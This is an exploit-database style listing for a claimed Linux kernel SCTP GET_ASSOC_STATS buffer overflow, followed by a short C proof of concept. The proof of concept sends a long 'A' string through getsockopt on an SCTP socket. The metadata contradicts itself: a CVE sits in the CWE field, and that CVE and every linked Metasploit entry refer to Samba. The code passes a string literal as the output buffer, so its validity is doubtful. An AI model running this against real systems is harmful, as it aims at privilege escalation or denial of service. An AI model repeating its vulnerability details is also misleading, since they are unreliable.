header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Jann Horn
6,5
CVSS
MEDIUM
Buffer Overflow
120
CWE
Product Name: Linux Kernel
Affected Version From: Linux kernel version 5.6.1
Affected Version To: Linux kernel version 5.6.7
Patch Exists: YES
Related CWE: CVE-2020-10760
CPE: o:linux:linux_kernel
Metasploit: https://www.rapid7.com/db/vulnerabilities/samba-cve-2020-10730/https://www.rapid7.com/db/vulnerabilities/samba-cve-2020-14303/https://www.rapid7.com/db/vulnerabilities/samba-cve-2020-10745/https://www.rapid7.com/db/vulnerabilities/samba-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-10745/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-10760/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-14303/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-10730/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-10760/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

SCTP GET_ASSOC_STATS Buffer Overflow

A buffer overflow vulnerability exists in the SCTP GET_ASSOC_STATS socket option in the Linux kernel. A local user can send a specially crafted SCTP_GET_ASSOC_STATS socket option request to the kernel, which can cause a buffer overflow and lead to privilege escalation or denial of service.

Mitigation:

Upgrade to the latest version of the Linux kernel
Source

Exploit-DB raw data:

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132

int main(void)
{
	char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	socklen_t len = strlen(buf);
	int fd;

	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
	getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
	return 0;
}

Navigation

Suggest Exploit

Services By CQR